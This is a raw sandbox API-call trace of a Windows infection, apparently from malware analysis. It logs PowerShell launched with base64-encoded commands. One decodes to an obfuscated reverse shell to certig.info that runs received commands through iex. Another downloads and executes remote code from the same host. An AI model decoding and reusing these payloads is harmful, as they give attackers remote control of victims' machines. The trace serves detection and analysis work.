	[0123.134] CoTaskMemAlloc (cb=0x104) returned 0x309710
	[0123.134] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x309710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0123.134] CoTaskMemFree (pv=0x309710) 
	[0123.300] CoTaskMemAlloc (cb=0x3b) returned 0x1cef44a0
	[0123.428] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c70d908, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c70d908) returned 0x4550
	[0123.429] CoTaskMemFree (pv=0x1cef44a0) 
	[0123.431] GetConsoleWindow () returned 0x40298
	[0123.438] CoTaskMemAlloc (cb=0x104) returned 0x309710
	[0123.438] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x309710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0123.439] CoTaskMemFree (pv=0x309710) 
	[0123.440] CoTaskMemAlloc (cb=0x104) returned 0x309710
	[0123.440] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x309710, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0123.440] CoTaskMemFree (pv=0x309710) 
	[0123.459] CoTaskMemAlloc (cb=0x104) returned 0x309710
	[0123.459] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x309710, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0123.459] CoTaskMemFree (pv=0x309710) 
	[0123.465] CommandLineToArgvW (in: lpCmdLine=" -encodedCommand IAAgACAAIAB3AGgAaQBsAGUAIAAoACQAdAByAHUAZQApAHsAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5ACAAIAAgACAAewAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAHMAQQBmAFgASQA9AE4AZQB3AC0ATwBiACcAJwBqAGUAYwB0ACAATgBlAHQALgBTAG8AYwAnACcAawBlAHQAcwAuAFQAQwBQACcAJwBDAGwAaQBlAG4AdAAoACIAYwBlAHIAdABpAGcALgBpAG4AZgBvACIALAAgADgAMAApADsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABqAFIAWQBuAFAAPQAoACQAcwBBAGYAWABJAC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApACkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJABHAFYAeABKAGQAPQAwAC4ALgA1ADAAMQB8ACUAIAB7ADAAfQA7ACAACQAJACAAIAAgAHcAaABpAGwAZQAoACgAJABrAEIAZgBOAGkAPQAkAGoAUgBZAG4AUAAuAFIAZQBhAGQAKAAkAEcAVgB4AEoAZAAsADAALAAkAEcAVgB4AEoAZAAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAIAAJAAkAIAAgACAAIAAkAFQARQBYAHUAeAA9ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQARwBWAHgASgBkACwAMAAsACQAawBCAGYATgBpACkAOwAkAEEARwBqAFQAbwA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAoAGkAZQAnACcAeAAgACQAVABFAFgAdQB4ACAAMgA+ACYAMQApACkAOwAkAGoAUgBZAG4AUAAuAFcAcgBpAHQAZQAoACQAQQBHAGoAVABvACwAMAAsACQAQQBHAGoAVABvAC4ATABlAG4AZwB0AGgAKQA7ACQAagBSAFkAbgBQAC4ARgBsAHUAcwBoACgAKQAgAAkACQAJAH0AIAAJAAkAIAB9ACAAIAAgACAAYwBhAHQAYwBoACAAIAAgACAAIAB7ACAAIAAJACAAIAAgACAAIAAgACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADAAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABzAEEAZgBYAEkALgBDAG8AbgBuAGUAYwB0AGUAZAApAHsACQAgAAkAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcwBBAGYAWABJAC4AQwBsAG8AcwBlACgAKQA7ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ACQAJAAkAIAAgACAACQAJAH0AIAAgACAAIAAgACAAIAB9AA==", pNumArgs=0x1c70d950 | out: pNumArgs=0x1c70d950) returned 0x1ce99a80*=""
	[0123.465] lstrlenW (lpString="-encodedCommand") returned 15
	[0123.465] CoTaskMemAlloc (cb=0x22) returned 0x1ceaa760
	[0123.465] RtlMoveMemory (in: Destination=0x1ceaa760, Source=0x1ce99aa2, Length=0x20 | out: Destination=0x1ceaa760) 
	[0123.465] CoTaskMemFree (pv=0x1ceaa760) 
	[0123.465] lstrlenW (lpString="IAAgACAAIAB3AGgAaQBsAGUAIAAoACQAdAByAHUAZQApAHsAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5ACAAIAAgACAAewAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAHMAQQBmAFgASQA9AE4AZQB3AC0ATwBiACcAJwBqAGUAYwB0ACAATgBlAHQALgBTAG8AYwAnACcAawBlAHQAcwAuAFQAQwBQACcAJwBDAGwAaQBlAG4AdAAoACIAYwBlAHIAdABpAGcALgBpAG4AZgBvACIALAAgADgAMAApADsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABqAFIAWQBuAFAAPQAoACQAcwBBAGYAWABJAC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApACkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJABHAFYAeABKAGQAPQAwAC4ALgA1ADAAMQB8ACUAIAB7ADAAfQA7ACAACQAJACAAIAAgAHcAaABpAGwAZQAoACgAJABrAEIAZgBOAGkAPQAkAGoAUgBZAG4AUAAuAFIAZQBhAGQAKAAkAEcAVgB4AEoAZAAsADAALAAkAEcAVgB4AEoAZAAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAIAAJAAkAIAAgACAAIAAkAFQARQBYAHUAeAA9ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQARwBWAHgASgBkACwAMAAsACQAawBCAGYATgBpACkAOwAkAEEARwBqAFQAbwA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAoAGkAZQAnACcAeAAgACQAVABFAFgAdQB4ACAAMgA+ACYAMQApACkAOwAkAGoAUgBZAG4AUAAuAFcAcgBpAHQAZQAoACQAQQBHAGoAVABvACwAMAAsACQAQQBHAGoAVABvAC4ATABlAG4AZwB0AGgAKQA7ACQAagBSAFkAbgBQAC4ARgBsAHUAcwBoACgAKQAgAAkACQAJAH0AIAAJAAkAIAB9ACAAIAAgACAAYwBhAHQAYwBoACAAIAAgACAAIAB7ACAAIAAJACAAIAAgACAAIAAgACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADAAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABzAEEAZgBYAEkALgBDAG8AbgBuAGUAYwB0AGUAZAApAHsACQAgAAkAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcwBBAGYAWABJAC4AQwBsAG8AcwBlACgAKQA7ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ACQAJAAkAIAAgACAACQAJAH0AIAAgACAAIAAgACAAIAB9AA==") returned 1736
	[0123.465] CoTaskMemAlloc (cb=0xd94) returned 0x1ce9a860
	[0123.465] RtlMoveMemory (in: Destination=0x1ce9a860, Source=0x1ce99ac2, Length=0xd92 | out: Destination=0x1ce9a860) 
	[0123.465] CoTaskMemFree (pv=0x1ce9a860) 
	[0123.467] LocalFree (hMem=0x1ce99a80) returned 0x0
	[0123.631] CoTaskMemAlloc (cb=0x804) returned 0x1b8a8d60
	[0123.631] GetConsoleTitleW (in: lpConsoleTitle=0x1b8a8d60, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0123.631] CoTaskMemFree (pv=0x1b8a8d60) 
	[0123.641] CoTaskMemAlloc (cb=0xe2e) returned 0x1ce99a80
	[0123.641] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -encodedCommand IAAgACAAIAB3AGgAaQBsAGUAIAAoACQAdAByAHUAZQApAHsAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5ACAAIAAgACAAewAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAHMAQQBmAFgASQA9AE4AZQB3AC0ATwBiACcAJwBqAGUAYwB0ACAATgBlAHQALgBTAG8AYwAnACcAawBlAHQAcwAuAFQAQwBQACcAJwBDAGwAaQBlAG4AdAAoACIAYwBlAHIAdABpAGcALgBpAG4AZgBvACIALAAgADgAMAApADsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABqAFIAWQBuAFAAPQAoACQAcwBBAGYAWABJAC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApACkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJABHAFYAeABKAGQAPQAwAC4ALgA1ADAAMQB8ACUAIAB7ADAAfQA7ACAACQAJACAAIAAgAHcAaABpAGwAZQAoACgAJABrAEIAZgBOAGkAPQAkAGoAUgBZAG4AUAAuAFIAZQBhAGQAKAAkAEcAVgB4AEoAZAAsADAALAAkAEcAVgB4AEoAZAAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAIAAJAAkAIAAgACAAIAAkAFQARQBYAHUAeAA9ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQARwBWAHgASgBkACwAMAAsACQAawBCAGYATgBpACkAOwAkAEEARwBqAFQAbwA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAoAGkAZQAnACcAeAAgACQAVABFAFgAdQB4ACAAMgA+ACYAMQApACkAOwAkAGoAUgBZAG4AUAAuAFcAcgBpAHQAZQAoACQAQQBHAGoAVABvACwAMAAsACQAQQBHAGoAVABvAC4ATABlAG4AZwB0AGgAKQA7ACQAagBSAFkAbgBQAC4ARgBsAHUAcwBoACgAKQAgAAkACQAJAH0AIAAJAAkAIAB9ACAAIAAgACAAYwBhAHQAYwBoACAAIAAgACAAIAB7ACAAIAAJACAAIAAgACAAIAAgACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADAAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABzAEEAZgBYAEkALgBDAG8AbgBuAGUAYwB0AGUAZAApAHsACQAgAAkAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcwBBAGYAWABJAC4AQwBsAG8AcwBlACgAKQA7ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ACQAJAAkAIAAgACAACQAJAH0AIAAgACAAIAAgACAAIAB9AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c70d8b0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30b3e80 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -encodedCommand IAAgACAAIAB3AGgAaQBsAGUAIAAoACQAdAByAHUAZQApAHsAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5ACAAIAAgACAAewAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAHMAQQBmAFgASQA9AE4AZQB3AC0ATwBiACcAJwBqAGUAYwB0ACAATgBlAHQALgBTAG8AYwAnACcAawBlAHQAcwAuAFQAQwBQACcAJwBDAGwAaQBlAG4AdAAoACIAYwBlAHIAdABpAGcALgBpAG4AZgBvACIALAAgADgAMAApADsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABqAFIAWQBuAFAAPQAoACQAcwBBAGYAWABJAC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApACkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJABHAFYAeABKAGQAPQAwAC4ALgA1ADAAMQB8ACUAIAB7ADAAfQA7ACAACQAJACAAIAAgAHcAaABpAGwAZQAoACgAJABrAEIAZgBOAGkAPQAkAGoAUgBZAG4AUAAuAFIAZQBhAGQAKAAkAEcAVgB4AEoAZAAsADAALAAkAEcAVgB4AEoAZAAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAIAAJAAkAIAAgACAAIAAkAFQARQBYAHUAeAA9ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQARwBWAHgASgBkACwAMAAsACQAawBCAGYATgBpACkAOwAkAEEARwBqAFQAbwA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAoAGkAZQAnACcAeAAgACQAVABFAFgAdQB4ACAAMgA+ACYAMQApACkAOwAkAGoAUgBZAG4AUAAuAFcAcgBpAHQAZQAoACQAQQBHAGoAVABvACwAMAAsACQAQQBHAGoAVABvAC4ATABlAG4AZwB0AGgAKQA7ACQAagBSAFkAbgBQAC4ARgBsAHUAcwBoACgAKQAgAAkACQAJAH0AIAAJAAkAIAB9ACAAIAAgACAAYwBhAHQAYwBoACAAIAAgACAAIAB7ACAAIAAJACAAIAAgACAAIAAgACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADAAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABzAEEAZgBYAEkALgBDAG8AbgBuAGUAYwB0AGUAZAApAHsACQAgAAkAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcwBBAGYAWABJAC4AQwBsAG8AcwBlACgAKQA7ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ACQAJAAkAIAAgACAACQAJAH0AIAAgACAAIAAgACAAIAB9AA==", lpProcessInformation=0x30b3e80*(hProcess=0x6c8, hThread=0x6c4, dwProcessId=0x120, dwThreadId=0xa3c)) returned 1
	[0123.646] CoTaskMemFree (pv=0x1ce99a80) 
	[0123.647] CloseHandle (hObject=0x6c4) returned 1
	[0123.648] CoTaskMemAlloc (cb=0x3b) returned 0x1cef44a0
	[0123.648] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c70d958, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c70d958) returned 0x4550
	[0123.648] CoTaskMemFree (pv=0x1cef44a0) 
	[0123.651] GetCurrentProcess () returned 0xffffffffffffffff
	[0123.651] GetCurrentProcess () returned 0xffffffffffffffff
	[0123.651] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x6c8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c70da38, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c70da38*=0x6c4) returned 1

Thread:
	id = 131
	os_tid = 0x30c


Thread:
	id = 135
	os_tid = 0x75c


Thread:
	id = 139
	os_tid = 0x2ac

	[0119.131] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0119.136] ResetEvent (hEvent=0x378) returned 1
	[0230.088] QueryContextAttributesW (in: phContext=0x1caee810, ulAttribute=0x1a, pBuffer=0x1caee990 | out: pBuffer=0x1caee990) returned 0x0
	[0230.566] DeleteSecurityContext (phContext=0x1caedfe0) returned 0x0
	[0230.568] shutdown (s=0x4cc, how=2) returned 0
	[0230.569] setsockopt (s=0x4cc, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0230.569] closesocket (s=0x4cc) returned 0
	[0262.972] CoUninitialize () 

Thread:
	id = 142
	os_tid = 0x828


Process:
	id = "6"
	image_name = "powershell.exe"
	filename = "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x3f288000"
	os_pid = "0xb30"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x998"
	cmd_line = "\"C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EnC SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGUAcgB0AGkAZwAuAGkAbgBmAG8AOgA0ADQAMwAvAGMAaABrAGUAcwBvAHMAbwBkAC8AZABvAHcAbgBzAC8AawB3AGYAcwBoAFEATQBaAEUAYQBqAGsARgB4ACcAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "32"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 92
	os_tid = 0xb2c

	[0091.140] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0091.603] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0091.603] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0091.604] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0091.604] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0104.216] GetVersionExW (in: lpVersionInformation=0x584bd8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x584bd8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0104.216] GetLastError () returned 0x2
	[0104.217] GetVersionExW (in: lpVersionInformation=0x584bd8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x584bd8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0104.217] GetLastError () returned 0x2
	[0104.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e62c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.351] GetLastError () returned 0x2
	[0104.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e648, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.568] GetLastError () returned 0x2
	[0104.568] GetVersionExW (in: lpVersionInformation=0x584bd8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x584bd8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0104.568] GetLastError () returned 0x2
	[0104.569] SetErrorMode (uMode=0x1) returned 0x1
	[0104.571] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x10eac8 | out: lpFileInformation=0x10eac8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0104.571] GetLastError () returned 0x2
	[0104.571] SetErrorMode (uMode=0x1) returned 0x1
	[0104.670] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x10eb4c | out: lpdwHandle=0x10eb4c) returned 0x94c
	[0104.671] GetLastError () returned 0x0
	[0104.672] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x28b4f50 | out: lpData=0x28b4f50) returned 1
	[0104.783] VerQueryValueW (in: pBlock=0x28b4f50, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x10eb18, puLen=0x10eb14 | out: lplpBuffer=0x10eb18*=0x28b4fec, puLen=0x10eb14) returned 1
	[0104.785] lstrlenW (lpString="䅁") returned 1
	[0105.294] VerQueryValueW (in: pBlock=0x28b4f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x10ea94, puLen=0x10ea90 | out: lplpBuffer=0x10ea94*=0x28b50c8, puLen=0x10ea90) returned 1
	[0105.294] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0105.296] lstrcpyW (in: lpString1=0x584bc0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0105.296] VerQueryValueW (in: pBlock=0x28b4f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x10ea94, puLen=0x10ea90 | out: lplpBuffer=0x10ea94*=0x28b511c, puLen=0x10ea90) returned 1
	[0105.296] lstrlenW (lpString="System.Management.Automation") returned 28
	[0105.296] lstrcpyW (in: lpString1=0x584bc0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0105.296] VerQueryValueW (in: pBlock=0x28b4f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x10ea94, puLen=0x10ea90 | out: lplpBuffer=0x10ea94*=0x28b5178, puLen=0x10ea90) returned 1
	[0105.296] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0105.296] lstrcpyW (in: lpString1=0x584bc0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0105.296] VerQueryValueW (in: pBlock=0x28b4f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x10ea94, puLen=0x10ea90 | out: lplpBuffer=0x10ea94*=0x28b51b8, puLen=0x10ea90) returned 1
	[0105.297] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0105.297] lstrcpyW (in: lpString1=0x584bc0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0105.297] VerQueryValueW (in: pBlock=0x28b4f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x10ea94, puLen=0x10ea90 | out: lplpBuffer=0x10ea94*=0x28b5220, puLen=0x10ea90) returned 1
	[0105.297] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0105.297] lstrcpyW (in: lpString1=0x584bc0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0105.297] VerQueryValueW (in: pBlock=0x28b4f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x10ea94, puLen=0x10ea90 | out: lplpBuffer=0x10ea94*=0x28b52bc, puLen=0x10ea90) returned 1
	[0105.297] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0105.297] lstrcpyW (in: lpString1=0x584bc0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0105.297] VerQueryValueW (in: pBlock=0x28b4f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x10ea94, puLen=0x10ea90 | out: lplpBuffer=0x10ea94*=0x28b5320, puLen=0x10ea90) returned 1
	[0105.297] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0105.297] lstrcpyW (in: lpString1=0x584bc0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0105.297] VerQueryValueW (in: pBlock=0x28b4f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x10ea94, puLen=0x10ea90 | out: lplpBuffer=0x10ea94*=0x28b539c, puLen=0x10ea90) returned 1
	[0105.297] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0105.297] lstrcpyW (in: lpString1=0x584bc0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0105.298] VerQueryValueW (in: pBlock=0x28b4f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x10ea94, puLen=0x10ea90 | out: lplpBuffer=0x10ea94*=0x28b5044, puLen=0x10ea90) returned 1
	[0105.298] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
